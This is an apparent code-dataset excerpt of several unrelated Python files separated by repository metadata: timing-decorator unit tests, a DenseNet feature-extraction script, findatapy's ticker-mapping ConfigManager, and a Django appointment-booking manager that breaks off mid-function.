e = expected_total_time / 2
self._assert(e - d, total, e + d)
total = 0.0
for timing in Clocked.get('loop 4'):
total += timing.duration_milliseconds
d = delta_upper_bound / 2
e = expected_total_time / 2
self._assert(e - d, total, e + d)
total = 0.0
for timing in Clocked.get('loop 2'):
total += timing.duration_milliseconds
d = delta_upper_bound
e = expected_total_time
self._assert(e - d, total, e + d)
def test_raise(self):
    """An exception raised inside a Clocked block must propagate to the caller."""
    with self.assertRaises(ValueError):
        with Clocked('test exception'):
            raise ValueError('some value error')
# noinspection PyDocstring
class TestDecorators(unittest.TestCase):
    """Tests the @clocked decorator on functions, classes and method kinds."""

    def _assert(self, mini, val, maxi):
        # Assert that ``val`` lies inside the inclusive [mini, maxi] window.
        self.assertTrue(
            mini <= val <= maxi,
            '{} <= {} <= {} is not true'.format(
                mini,
                val,
                maxi
            )
        )

    def _assert_single_timing(self, pattern):
        # Exactly one timing should match ``pattern``, and its duration
        # should be close to the 20 ms sleep in the decorated method.
        timings = [t for t in Clocked.get(pattern)]
        self.assertEqual(1, len(timings))
        self._assert(20 - 2, timings[0].duration_milliseconds, 20 + 2)

    def test_function_decorator(self):
        Clocked.initialize('test function decorator')
        TestDecorators.TestFunctionObj.delay_method()
        self._assert_single_timing('test_clocked.delay_method.*')

    class TestFunctionObj(object):
        @classmethod
        @clocked
        def delay_method(cls):
            sleep(.02)

    def test_class_decorator(self):
        Clocked.initialize('test class decorator')
        TestDecorators.TestClassObj.delay_method()
        self._assert_single_timing('.*delay_method.*')

    @clocked
    class TestClassObj(object):
        @classmethod
        def delay_method(cls):
            sleep(.02)

    def test_function_and_class_decorators(self):
        Clocked.initialize('test function and class decorators')
        TestDecorators.TestFunctionAndClassObj.delay_method()
        self._assert_single_timing('.*delay_method.*')

    class TestFunctionAndClassObj(object):
        @classmethod
        @clocked
        def delay_method(cls):
            sleep(.02)

    def test_not_classmethods(self):
        Clocked.initialize('test function and class decorators')
        instance = TestDecorators.TestNotClassmethods()
        instance.delay_method()
        self._assert_single_timing('.*delay_method.*')

    @clocked
    class TestNotClassmethods(object):
        def delay_method(self):
            sleep(.02)

    def test_static_method(self):
        Clocked.initialize('test function and class decorators')
        TestDecorators.TestStaticMethod.delay_method()
        self._assert_single_timing('.*delay_method.*')

    @clocked
    class TestStaticMethod(object):
        @staticmethod
        def delay_method():
            sleep(.02)
| 27.454054 | 67 | 0.556803 |
795b9031e39178494c4ea916744b7f8b1cb05a3b | 1,738 | py | Python | extract.py | InvokerLiu/DenseNet-Tensorflow | 8e171eb3f14a46cc68cdebd3d4db92b1376af698 | [
"Apache-2.0"
] | 2 | 2019-05-07T03:34:27.000Z | 2019-05-07T03:37:43.000Z | extract.py | InvokerLiu/DenseNet-Tensorflow | 8e171eb3f14a46cc68cdebd3d4db92b1376af698 | [
"Apache-2.0"
] | null | null | null | extract.py | InvokerLiu/DenseNet-Tensorflow | 8e171eb3f14a46cc68cdebd3d4db92b1376af698 | [
"Apache-2.0"
] | null | null | null | #! /usr/bin/env python3
# coding=utf-8
# ================================================================
#
# Editor : PyCharm
# File name : extract.py
# Author : LiuBo
# Created date: 2019-05-09 09:52
# Description :
#
# ================================================================
from nets.DenseNet56 import DenseNet56
from nets.DenseNet48 import DenseNet48
from nets.DenseNet40 import DenseNet40
from nets.DenseNet32 import DenseNet32
from nets.DenseNet24 import DenseNet24
from nets.DenseNet16 import DenseNet16
from nets.DenseNet8 import DenseNet8
from Utils.FeatureExtractor import FeatureExtractor
import numpy
if __name__ == "__main__":
    # Experiment configuration: segmentation scale, the network input size
    # (selects which DenseNet variant/checkpoint to use) and the id of the
    # single object whose deep features are extracted.
    segmentation_scale = 90
    input_size = 40
    object_id = 31936

    model = DenseNet40(
        train_summary_dir="summary/train/" + str(input_size),
        test_summary_dir="summary/test/" + str(input_size),
        training=False,
    )

    original_file = "D:/DoLab/Research/Data/WV/WV10400.jpg"
    window_set_file = ("WindowSet/WV/" + str(segmentation_scale) +
                       "/WindowSet" + str(input_size) + "Percent.txt")
    result_file = ("features/WV/" + str(segmentation_scale) +
                   "/meanFeatures" + str(input_size) + ".txt")
    checkpoint = "checkpoint/" + str(input_size)
    deep_features_file = ("features/WV/" + str(segmentation_scale) + "/" +
                          str(object_id) + "_" + str(input_size) + ".tif")
    aggregation_function = numpy.mean  # used by the batch extraction below

    extractor = FeatureExtractor(model)
    extractor.extract_object_features_by_id(
        window_set_file, deep_features_file, checkpoint, original_file,
        object_id)
    # Batch extraction over all objects (writes aggregated features):
    # extractor.extract_features(window_set_file, result_file, checkpoint,
    #                            original_file, aggregation_function)
795b9092659ad7fbba35b21bf555895e1b375519 | 14,208 | py | Python | .venv/lib/python3.8/site-packages/findatapy/util/configmanager.py | eo1989/VectorBTanalysis | bea3deaf2ee3fc114b308146f2af3e4f35f70197 | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/findatapy/util/configmanager.py | eo1989/VectorBTanalysis | bea3deaf2ee3fc114b308146f2af3e4f35f70197 | [
"MIT"
] | null | null | null | .venv/lib/python3.8/site-packages/findatapy/util/configmanager.py | eo1989/VectorBTanalysis | bea3deaf2ee3fc114b308146f2af3e4f35f70197 | [
"MIT"
] | null | null | null | __author__ = 'saeedamen' # Saeed Amen
#
# Copyright 2016 Cuemacro
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and limitations under the License.
#
import csv
from findatapy.util.dataconstants import DataConstants
from findatapy.util.singleton import Singleton
from findatapy.util.loggermanager import LoggerManager
from dateutil.parser import parse
import re
import threading
class ConfigManager(object):
    """Functions for converting between vendor tickers and findatapy tickers (and vice-versa).

    All mappings are loaded once from the CSV files referenced by
    ``DataConstants`` and cached in class-level dictionaries, so every
    lookup after the initial population is a plain dictionary read.
    """

    # NOTE(review): ``__metaclass__`` is the Python 2 spelling and is
    # ignored by Python 3; the singleton behaviour actually comes from
    # get_instance() below.  Confirm before converting this to
    # ``class ConfigManager(metaclass=Singleton)``.
    __metaclass__ = Singleton

    # findatapy ticker <-> vendor ticker, findatapy field <-> vendor field
    _dict_time_series_tickers_list_library_to_vendor = {}
    _dict_time_series_tickers_list_vendor_to_library = {}
    _dict_time_series_fields_list_vendor_to_library = {}
    _dict_time_series_fields_list_library_to_vendor = {}

    # "source.ticker" -> expiry date (datetime, raw string if unparseable,
    # or None when absent)
    _dict_time_series_ticker_expiry_date_library_to_library = {}

    # "category.source.freq.cut" -> fields / start date / tickers
    _dict_time_series_category_fields_library_to_library = {}
    _dict_time_series_category_startdate_library_to_library = {}
    _dict_time_series_category_tickers_library_to_library = {}

    # retained for compatibility with older callers (not populated here)
    _dict_time_series_tickers_list_library = {}

    __lock = threading.Lock()
    __instance = None

    def __init__(self, *args, **kwargs):
        # All state lives in class-level dictionaries; nothing to do here.
        pass

    @classmethod
    def get_instance(cls):
        """Return the lazily created singleton, populating the lookup tables once.

        Uses double-checked locking so concurrent first calls populate the
        dictionaries a single time.  Declared as a classmethod (fix) so it
        works both as ``ConfigManager.get_instance()`` and on an instance.
        """
        if not ConfigManager.__instance:
            with ConfigManager.__lock:
                if not ConfigManager.__instance:
                    ConfigManager.__instance = \
                        super(ConfigManager, cls).__new__(ConfigManager)
                    ConfigManager.__instance.populate_time_series_dictionaries()
        return ConfigManager.__instance

    ### time series ticker manipulators
    @staticmethod
    def populate_time_series_dictionaries():
        """Load ticker/field/category mappings from the configuration CSVs.

        Three kinds of file are read (paths come from ``DataConstants``):

        * time_series_tickers_list - one row per ticker: category, source,
          freq, ticker, cut, sourceticker (and optionally expiry), mapping
          findatapy tickers to vendor tickers,
          e.g. fx / bloomberg / daily / EURUSD / TOK / EURUSD CMPT Curncy
        * time_series_fields_list - source, field, sourcefield, mapping
          findatapy field names to vendor field names,
          e.g. bloomberg / close / PX_LAST
        * time_series_categories_fields - category, freq, source, fields,
          startdate: generic properties per category,
          e.g. fx / daily / bloomberg / close,high,low,open / 01-Jan-70
        """
        import os

        ## populate tickers list (the constant may reference several
        ## ';'-separated files)
        for tickers_list_file in \
                DataConstants().time_series_tickers_list.split(';'):
            if not os.path.isfile(tickers_list_file):
                continue

            # "with" ensures the CSV file handle is closed (the original
            # leaked open file objects)
            with open(tickers_list_file) as csv_file:
                for line in csv.DictReader(csv_file):
                    category = line["category"]
                    source = line["source"]

                    freq_list = line["freq"].split(',')
                    if isinstance(freq_list, str):
                        freq_list = [freq_list]

                    for freq in freq_list:
                        ticker = line["ticker"]
                        cut = line["cut"]
                        sourceticker = line["sourceticker"]

                        # the 'expiry' column is optional
                        expiry = line.get('expiry')

                        if category != "":
                            # findatapy ticker -> vendor sourceticker
                            ConfigManager._dict_time_series_tickers_list_library_to_vendor[
                                category + '.' +
                                source + '.' +
                                freq + '.' +
                                cut + '.' +
                                ticker] = sourceticker

                            try:
                                if expiry is not None and expiry != '':
                                    expiry = parse(expiry)
                                else:
                                    expiry = None
                            except (ValueError, OverflowError, TypeError):
                                # unparseable expiry dates are kept as the
                                # raw string (original behaviour)
                                pass

                            # findatapy "source.ticker" -> expiry date
                            ConfigManager._dict_time_series_ticker_expiry_date_library_to_library[
                                source + '.' + ticker] = expiry

                            # vendor sourceticker -> findatapy ticker
                            ConfigManager._dict_time_series_tickers_list_vendor_to_library[
                                source + '.' + sourceticker] = ticker

                            # group tickers by category descriptor
                            key = category + '.' + source + '.' + freq + '.' + cut
                            ConfigManager._dict_time_series_category_tickers_library_to_library \
                                .setdefault(key, []).append(ticker)

        ## populate fields conversions
        with open(DataConstants().time_series_fields_list) as csv_file:
            for line in csv.DictReader(csv_file):
                source = line["source"]
                field = line["field"]
                sourcefield = line["sourcefield"]

                # vendor sourcefield -> findatapy field
                ConfigManager._dict_time_series_fields_list_vendor_to_library[
                    source + '.' + sourcefield] = field

                # findatapy field -> vendor sourcefield
                ConfigManager._dict_time_series_fields_list_library_to_vendor[
                    source + '.' + field] = sourcefield

        ## populate categories field list
        with open(DataConstants().time_series_categories_fields) as csv_file:
            for line in csv.DictReader(csv_file):
                category = line["category"]
                source = line["source"]
                freq = line["freq"]
                cut = line["cut"]
                fields = line["fields"].split(',')  # can have multiple fields
                startdate = line["startdate"]

                if category != "":
                    key = category + '.' + source + '.' + freq + '.' + cut

                    # category descriptor -> fields list
                    ConfigManager._dict_time_series_category_fields_library_to_library[
                        key] = fields

                    # category descriptor -> start date
                    ConfigManager._dict_time_series_category_startdate_library_to_library[
                        key] = parse(startdate).date()

    @staticmethod
    def get_categories_from_fields():
        """Return all category descriptors that have a fields definition."""
        return ConfigManager._dict_time_series_category_fields_library_to_library.keys()

    @staticmethod
    def get_categories_from_tickers():
        """Return all category descriptors that have tickers defined."""
        return ConfigManager._dict_time_series_category_tickers_library_to_library.keys()

    @staticmethod
    def get_categories_from_tickers_selective_filter(filter):
        """Return category descriptors whose category part contains *filter*."""
        initial_list = \
            ConfigManager._dict_time_series_category_tickers_library_to_library.keys()

        # each descriptor is "category.source.freq.cut"; the substring
        # match is applied to the category component only
        return [desc for desc in initial_list if filter in desc.split('.')[0]]

    @staticmethod
    def get_potential_caches_from_tickers():
        """Expand category descriptors into potential cache keys.

        Intraday categories get one key per ticker (cache granularity is
        the individual ticker); other frequencies get one key per category.
        """
        expanded_category_list = []

        for desc in \
                ConfigManager._dict_time_series_category_tickers_library_to_library.keys():
            category, source, freq, cut = desc.split(".")

            if freq == 'intraday':
                for ticker in ConfigManager().get_tickers_list_for_category(
                        category, source, freq, cut):
                    expanded_category_list.append(
                        category + '.' + source + '.' + freq + '.' + cut +
                        '.' + ticker)
            else:
                expanded_category_list.append(
                    category + '.' + source + '.' + freq + '.' + cut)

        return expanded_category_list

    @staticmethod
    def get_fields_list_for_category(category, source, freq, cut):
        """Return the findatapy fields defined for a category descriptor."""
        return ConfigManager._dict_time_series_category_fields_library_to_library[
            category + '.' + source + '.' + freq + '.' + cut]

    @staticmethod
    def get_startdate_for_category(category, source, freq, cut):
        """Return the configured start date for a category descriptor."""
        return ConfigManager._dict_time_series_category_startdate_library_to_library[
            category + '.' + source + '.' + freq + '.' + cut]

    @staticmethod
    def get_expiry_for_ticker(source, ticker):
        """Return the expiry date recorded for "source.ticker" (or None)."""
        return ConfigManager._dict_time_series_ticker_expiry_date_library_to_library[
            source + '.' + ticker]

    @staticmethod
    def get_filtered_tickers_list_for_category(category, source, freq, cut, filter):
        """Return the category's tickers whose names match the regex *filter*."""
        tickers = ConfigManager._dict_time_series_category_tickers_library_to_library[
            category + '.' + source + '.' + freq + '.' + cut]

        return [tick for tick in tickers if re.search(filter, tick)]

    @staticmethod
    def get_tickers_list_for_category(category, source, freq, cut):
        """Return every ticker defined for a category descriptor."""
        return ConfigManager._dict_time_series_category_tickers_library_to_library[
            category + '.' + source + '.' + freq + '.' + cut]

    @staticmethod
    def convert_library_to_vendor_ticker(category, source, freq, cut, ticker):
        """Translate a findatapy ticker into the vendor's ticker."""
        return ConfigManager._dict_time_series_tickers_list_library_to_vendor[
            category + '.' + source + '.' + freq + '.' + cut + '.' + ticker]

    @staticmethod
    def convert_vendor_to_library_ticker(source, sourceticker):
        """Translate a vendor ticker into the findatapy ticker."""
        return ConfigManager._dict_time_series_tickers_list_vendor_to_library[
            source + '.' + sourceticker]

    @staticmethod
    def convert_vendor_to_library_field(source, sourcefield):
        """Translate a vendor field name into the findatapy field name."""
        return ConfigManager._dict_time_series_fields_list_vendor_to_library[
            source + '.' + sourcefield]

    @staticmethod
    def convert_library_to_vendor_field(source, field):
        """Translate a findatapy field name into the vendor's field name."""
        return ConfigManager._dict_time_series_fields_list_library_to_vendor[
            source + '.' + field]
## test function
## test function
if __name__ == '__main__':
    logger = LoggerManager().getLogger(__name__)

    categories = ConfigManager().get_categories_from_fields()
    logger.info("Categories from fields list")
    print(categories)

    categories = ConfigManager().get_categories_from_tickers()
    logger.info("Categories from tickers list")
    print(categories)

    filter = 'events'
    categories_filtered = \
        ConfigManager().get_categories_from_tickers_selective_filter(filter)
    logger.info("Categories from tickers list, filtered by events")
    print(categories_filtered)

    logger.info("For each category, print all tickers and fields")
    for desc in categories:
        parts = desc.split(".")
        category, source, freq, cut = parts[0], parts[1], parts[2], parts[3]

        logger.info("tickers for " + desc)
        print(ConfigManager().get_tickers_list_for_category(
            category, source, freq, cut))

        logger.info("fields for " + desc)
        print(ConfigManager().get_fields_list_for_category(
            category, source, freq, cut))

    # exercise the various converter mechanisms
    print(ConfigManager().convert_library_to_vendor_ticker(
        category='fx', source='bloomberg', freq='daily', cut='TOK',
        ticker='USDJPY'))
    print(ConfigManager().convert_vendor_to_library_ticker(
        source='bloomberg', sourceticker='EURUSD CMPT Curncy'))
    print(ConfigManager().convert_vendor_to_library_field(
        source='bloomberg', sourcefield='PX_LAST'))
    print(ConfigManager().convert_library_to_vendor_field(
        source='bloomberg', field='close'))

    x = 5  # breakpoint anchor
| 39.798319 | 129 | 0.578407 |
795b921295d4eaedad3a19761d118d03b72217e5 | 26,819 | py | Python | booking/managers.py | mattmc318/Pharmasseuse | aed9e7c40ada7ac1d4e6f080e05ba96fda0ea53f | [
"MIT"
] | null | null | null | booking/managers.py | mattmc318/Pharmasseuse | aed9e7c40ada7ac1d4e6f080e05ba96fda0ea53f | [
"MIT"
] | 1 | 2019-06-25T01:24:05.000Z | 2019-06-27T21:08:41.000Z | booking/managers.py | mattmc318/Pharmasseuse | aed9e7c40ada7ac1d4e6f080e05ba96fda0ea53f | [
"MIT"
] | null | null | null | import pytz
import sys
from django.db import models
from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned
from datetime import date, datetime, timedelta
from dateutil.relativedelta import relativedelta
from pharmasseuse.settings import TIME_ZONE
tz = pytz.timezone(TIME_ZONE)
class AppointmentManager(models.Manager):
    """Manager holding all booking-flow logic for Appointment objects.

    Methods take a Django ``request`` and return either a bare bool or a
    ``(success, payload)`` tuple where ``payload`` is a template context
    dict, a message string, or a list of error strings.  All date
    arithmetic converts between the local zone ``tz`` and UTC.
    """

    def index(self, request):
        # Context for the booking index page: the first day that still has
        # open (unbooked, non-blacked-out) slots after tomorrow, plus the
        # neighbouring previous/next days that have availability.
        from users.models import Profile
        from booking.models import Appointment

        profile = Profile.objects.get(user__pk=request.session['id']) \
            if 'id' in request.session else None

        # local midnight today; bookable slots must start after tomorrow
        today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)

        appts = Appointment.objects.filter(
            date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
            profile__isnull=True,
            black_out=False,
        ).order_by('date_start')

        try:
            date_begin = appts[0].date_start
            date_begin = date_begin.astimezone(tz)
            date_begin = date_begin.replace(hour=0, minute=0, second=0, microsecond=0)
        except IndexError:
            # no open slots at all: fall back to today
            date_begin = today

        # nearest available slot strictly before date_begin
        prev_appt = Appointment.objects.filter(
            date_start__lt=date_begin.astimezone(pytz.utc),
            date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1),
            profile__isnull=True,
            black_out=False,
        ).order_by('-date_start').first()

        # nearest available slot on/after the day following date_begin
        next_appt = Appointment.objects \
            .filter(
                date_start__gte=date_begin.astimezone(pytz.utc) + timedelta(days=1),
                profile__isnull=True,
                black_out=False,
            ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
            .order_by('date_start').first()

        errors = []  # NOTE(review): never used in this method

        # .first() returns None when nothing matched -> AttributeError;
        # fall back to +/- one calendar day
        try:
            prev = prev_appt.date_start
        except AttributeError:
            prev = date_begin - timedelta(days=1)

        try:
            next = next_appt.date_start
        except AttributeError:
            next = date_begin + timedelta(days=1)

        return (True, {
            'date': date_begin,
            'prev': prev,
            'next': next,
            'profile': profile,
        })

    def create_appointment(self, date_start, date_end):
        # Idempotently create an open slot spanning [date_start, date_end].
        # Returns (True, appt) on success or (False, exception).
        from booking.models import Appointment

        # reuse an existing slot with the same boundaries if there is one
        try:
            appt = Appointment.objects.get(
                date_start=date_start,
                date_end=date_end,
            )
            return (True, appt)
        except ObjectDoesNotExist:
            pass

        try:
            appt = Appointment.objects.create(
                profile=None,
                date_start=date_start,
                date_end=date_end,
                black_out=False,
            )
        except Exception as exception:
            return (False, exception)

        return (True, appt)

    def create_appointments(self, date, verbose=False):
        # Create the standard slot schedule for one calendar date:
        # weekends get a full day of slots, weekdays evenings only.
        # Returns (True, None) or (False, exception).
        from booking.models import Appointment

        tz = pytz.timezone(TIME_ZONE)  # local name shadows module-level tz

        def toUTC(dt):
            # interpret naive dt as local wall time, then convert to UTC
            return tz.normalize(tz.localize(dt)).astimezone(pytz.utc)

        def appointments(times):
            # times: sequence of ((hour_start, min_start), (hour_end, min_end))
            for pair in times:
                hour_start, minute_start = pair[0]
                hour_end, minute_end = pair[1]
                date_start = toUTC(datetime(
                    date.year,
                    date.month,
                    date.day,
                    hour_start,
                    minute_start,
                ))
                date_end = toUTC(datetime(
                    date.year,
                    date.month,
                    date.day,
                    hour_end,
                    minute_end,
                ))
                valid, response = self.create_appointment(date_start, date_end)
                if not valid:
                    raise response
                if verbose:
                    print('%s %s' % (response.date_start, response.date_end))

        def weekend():
            appointments([
                [(8, 0), (8, 50)],    # 8am
                [(9, 0), (9, 50)],    # 9am
                [(10, 0), (10, 50)],  # 10am
                [(11, 0), (11, 50)],  # 11am
                [(13, 0), (13, 50)],  # 1pm
                [(14, 0), (14, 50)],  # 2pm
                [(15, 0), (15, 50)],  # 3pm
                [(17, 0), (17, 50)],  # 5pm
                [(18, 0), (18, 50)],  # 6pm
                [(19, 0), (19, 50)],  # 7pm
            ])

        def weekday():
            appointments([
                [(17, 0), (17, 50)],  # 5pm
                [(18, 0), (18, 50)],  # 6pm
                [(19, 0), (19, 50)],  # 7pm
            ])

        # Mon-Fri (0-4) -> weekday schedule; Sat/Sun (5-6) -> weekend
        options = {
            0: weekday,
            1: weekday,
            2: weekday,
            3: weekday,
            4: weekday,
            5: weekend,
            6: weekend,
        }

        try:
            options[date.weekday()]()
        except Exception as exception:
            return (False, exception)

        return (True, None)

    def date_picker(self, request):
        # Build a 42-cell (6 weeks x 7 days) month grid for the date-picker
        # widget, starting on the Sunday on/before the 1st of the month.
        from booking.models import Appointment

        today = datetime.now(tz)
        year = int(request.GET.get('year', today.year))
        month = int(request.GET.get('month', today.month))

        date = first_of_month = datetime(year, month, 1, tzinfo=tz)
        calendar = []

        # rewind to the previous Sunday (weekday() == 6)
        while date.weekday() != 6:
            date = date - timedelta(days=1)

        for _ in range(42):
            appts = Appointment.objects.filter(
                date_start__date=date,
                profile__isnull=True,
                black_out=False,
            )
            # a cell is selectable when it is in the future, inside the
            # displayed month, and has at least one open slot
            calendar.append({
                'date': date,
                'active': \
                    date > today and \
                    date.month == first_of_month.month and \
                    len(appts) > 0,
            })
            date = date + timedelta(days=1)

        return {
            'date': first_of_month,
            'calendar': calendar,
            'prev': first_of_month + relativedelta(months=-1),
            'next': first_of_month + relativedelta(months=+1),
        }

    def day(self, request, admin=False):
        # Return the hour labels and open slots for a single day.
        # Admin requests arrive via POST and also see blacked-out slots;
        # client requests arrive via GET and see bookable slots only.
        from booking.models import Appointment

        today = datetime.now(tz).replace(
            hour=0, minute=0, second=0, microsecond=0)
        tomorrow = today + timedelta(days=1)  # NOTE(review): unused

        if admin:
            try:
                day = datetime(
                    int(request.POST.get('year')),
                    int(request.POST.get('month')),
                    int(request.POST.get('day')),
                    0, 0, 0, 0,
                )
            except TypeError:
                # missing parameter: int(None) raises TypeError
                return (False, None)
        else:
            try:
                day = datetime(
                    int(request.GET.get('year')),
                    int(request.GET.get('month')),
                    int(request.GET.get('day')),
                    0, 0, 0, 0,
                )
            except TypeError:
                return (False, None)

        # Detect a DST transition on this day by comparing the zone's DST
        # offset at midnight with the offset three hours later.
        # NOTE(review): relies on the private pytz attribute tzinfo._dst;
        # confirm this still holds for the pytz version in use.
        after_change = day + timedelta(hours=3)

        day = tz.localize(day)
        after_change = tz.localize(after_change)

        spring_forward = day.tzinfo._dst.seconds < after_change.tzinfo._dst.seconds
        fall_back = day.tzinfo._dst.seconds > after_change.tzinfo._dst.seconds

        # Hour labels for the day column: 24 rows normally, 23 on
        # spring-forward (2am skipped), 25 on fall-back (1am repeated).
        times = []
        if spring_forward:
            for i in range(2):
                times.append({
                    'hour': '12' if i % 12 == 0 else str(i % 12),
                    'minute': '00',
                    'ampm': 'a.m.' if i < 12 else 'p.m.',
                })
            for i in range(3, 24):
                times.append({
                    'hour': '12' if i % 12 == 0 else str(i % 12),
                    'minute': '00',
                    'ampm': 'a.m.' if i < 12 else 'p.m.',
                })
        elif fall_back:
            for i in range(2):
                times.append({
                    'hour': '12' if i % 12 == 0 else str(i % 12),
                    'minute': '00',
                    'ampm': 'a.m.' if i < 12 else 'p.m.',
                })
            # NOTE(review): 'hour' is an int here (str elsewhere) and the
            # 'ampm' expression reuses the stale loop variable ``i`` from
            # the loop above -- confirm this repeated-1am row renders
            # correctly before relying on it.
            times.append({
                'hour': 1,
                'minute': '00',
                'ampm': 'a.m.' if i < 12 else 'p.m.',
            })
            for i in range(2, 24):
                times.append({
                    'hour': '12' if i % 12 == 0 else str(i % 12),
                    'minute': '00',
                    'ampm': 'a.m.' if i < 12 else 'p.m.',
                })
        else:
            for i in range(24):
                times.append({
                    'hour': '12' if i % 12 == 0 else str(i % 12),
                    'minute': '00',
                    'ampm': 'a.m.' if i < 12 else 'p.m.',
                })

        if admin:
            # admins also see blacked-out slots
            appts = Appointment.objects.filter(
                date_start__gte=day.astimezone(pytz.utc),
                date_start__lt=day.astimezone(pytz.utc) + timedelta(days=1),
                profile__isnull=True,
            ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
                .order_by('date_start')
        else:
            appts = Appointment.objects.filter(
                date_start__gte=day.astimezone(pytz.utc),
                date_start__lt=day.astimezone(pytz.utc) + timedelta(days=1),
                profile__isnull=True,
                black_out=False,
            ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
                .order_by('date_start')

        slots = []
        for appt in appts:
            date_start = appt.date_start
            date_end = appt.date_end

            date_start = date_start.astimezone(tz)
            date_end = date_end.astimezone(tz)

            # lower-case 'a.m.'/'p.m.' labels for display
            ampm_start = date_start.strftime('%p')
            ampm_end = date_end.strftime('%p')
            if ampm_start == 'AM':
                ampm_start = 'a.m.'
            elif ampm_start == 'PM':
                ampm_start = 'p.m.'
            if ampm_end == 'AM':
                ampm_end = 'a.m.'
            elif ampm_end == 'PM':
                ampm_end = 'p.m.'

            # row index into the times grid, shifted across a DST change
            hour = date_start.astimezone(tz).hour
            if spring_forward and hour >= 2:
                hour = hour - 1
            if fall_back and hour >= 2:
                hour = hour + 1

            slots.append({
                'hour': hour,
                'id': appt.id,
                'start': '%d:%02d %s' % (
                    date_start.hour % 12,
                    date_start.minute,
                    ampm_start,
                ),
                'end': '%d:%02d %s' % (
                    date_end.hour % 12,
                    date_end.minute,
                    ampm_end,
                ),
                'black_out': appt.black_out,
            })

        return (True, {
            'times': times,
            'slots': slots,
        })

    def prev(self, request, admin=False):
        # Locate a neighbouring day with open slots relative to the posted
        # day; returns (True, {'exists': bool[, 'date': {...}]}).
        # NOTE(review): these queries are identical to next() -- they select
        # slots *after* the requested day (date_start__gte day+1, ascending
        # order), which looks like a copy-paste.  A "previous day" lookup
        # would be expected to use date_start__lt with '-date_start'.
        # Confirm against the calling views before changing.
        from booking.models import Appointment

        today = datetime.now(tz).replace(
            hour=0, minute=0, second=0, microsecond=0)

        if admin:
            try:
                day = datetime(
                    int(request.POST.get('year')),
                    int(request.POST.get('month')),
                    int(request.POST.get('day')),
                    0, 0, 0, 0,
                )
                day = tz.localize(day)
            except TypeError:
                return (False, None)

            appts = Appointment.objects \
                .filter(
                    date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
                    profile__isnull=True,
                ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
                .order_by('date_start')
        else:
            try:
                day = datetime(
                    int(request.GET.get('year')),
                    int(request.GET.get('month')),
                    int(request.GET.get('day')),
                    0, 0, 0, 0,
                )
                day = tz.localize(day)
            except TypeError:
                return (False, None)

            appts = Appointment.objects \
                .filter(
                    date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
                    profile__isnull=True,
                    black_out=False,
                ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
                .order_by('date_start')

        if len(appts) > 0:
            return (True, {
                'exists': True,
                'date': {
                    'year': appts[0].date_start.astimezone(tz).year,
                    'month': appts[0].date_start.astimezone(tz).month,
                    'day': appts[0].date_start.astimezone(tz).day,
                }
            })
        else:
            return (True, {'exists': False})

    def next(self, request, admin=False):
        # Locate the next day after the posted day that has open slots
        # (admins also see blacked-out ones); same payload shape as prev().
        from booking.models import Appointment

        today = datetime.now(tz).replace(
            hour=0, minute=0, second=0, microsecond=0)

        if admin:
            try:
                day = datetime(
                    int(request.POST.get('year')),
                    int(request.POST.get('month')),
                    int(request.POST.get('day')),
                    0, 0, 0, 0,
                )
                day = tz.localize(day)
            except TypeError:
                return (False, None)

            appts = Appointment.objects \
                .filter(
                    date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
                    profile__isnull=True,
                ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
                .order_by('date_start')
        else:
            try:
                day = datetime(
                    int(request.GET.get('year')),
                    int(request.GET.get('month')),
                    int(request.GET.get('day')),
                    0, 0, 0, 0,
                )
                day = tz.localize(day)
            except TypeError:
                return (False, None)

            appts = Appointment.objects \
                .filter(
                    date_start__gte=day.astimezone(pytz.utc) + timedelta(days=1),
                    profile__isnull=True,
                    black_out=False,
                ).filter(date_start__gte=today.astimezone(pytz.utc) + timedelta(days=1)) \
                .order_by('date_start')

        if len(appts) > 0:
            return (True, {
                'exists': True,
                'date': {
                    'year': appts[0].date_start.astimezone(tz).year,
                    'month': appts[0].date_start.astimezone(tz).month,
                    'day': appts[0].date_start.astimezone(tz).day,
                }
            })
        else:
            return (True, {'exists': False})

    def submit(self, request):
        # Book an open slot for the posted profile; a client may hold at
        # most one upcoming appointment at a time.
        from users.models import Profile
        from .models import Appointment

        user_id = int(request.session.get('id', 0))
        profile_id = int(request.POST.get('profile-id', 0))
        appointment_id = request.POST.get('appointment-id')
        massage = request.POST.get('massage')

        try:
            profile = Profile.objects.get(pk=profile_id)
            # any not-yet-finished bookings this profile already holds
            appts = Appointment.objects.filter(
                profile=profile,
                date_end__gt=datetime.now(pytz.utc),
                black_out=False,
            )
        except Exception as exception:
            return (False, [
                'There was an error booking your appointment.',
                exception,
            ])

        if len(appts) == 0:
            appt = Appointment.objects.get(pk=appointment_id)
            appt.profile = profile
            appt.massage = massage if massage != '' else None
            appt.save()
        else:
            return (False, ['You may only book one appointment at a time.'])

        # third-person phrasing when an admin books for another client
        name = 'your' if user_id == profile_id \
            else '%s %s\'s' % (profile.user.first_name, profile.user.last_name)
        message = 'You have successfully scheduled %s appointment.' % name
        return (True, message)

    def cancel_appointment(self, request):
        # Release the posted client's upcoming appointment (clears both the
        # owner and the requested massage type on the slot).
        from users.models import Profile
        from .models import Appointment

        user_id = int(request.session.get('id', 0))
        client_id = int(request.POST.get('profile-id', 0))

        today = datetime.now(tz).replace(hour=0, minute=0, second=0, microsecond=0)

        try:
            profile = Profile.objects.get(pk=client_id)
            appt = Appointment.objects.get(
                profile__pk=client_id,
                date_start__gt=today.astimezone(pytz.utc) + timedelta(days=1),
                black_out=False,
            )
            appt.profile = None
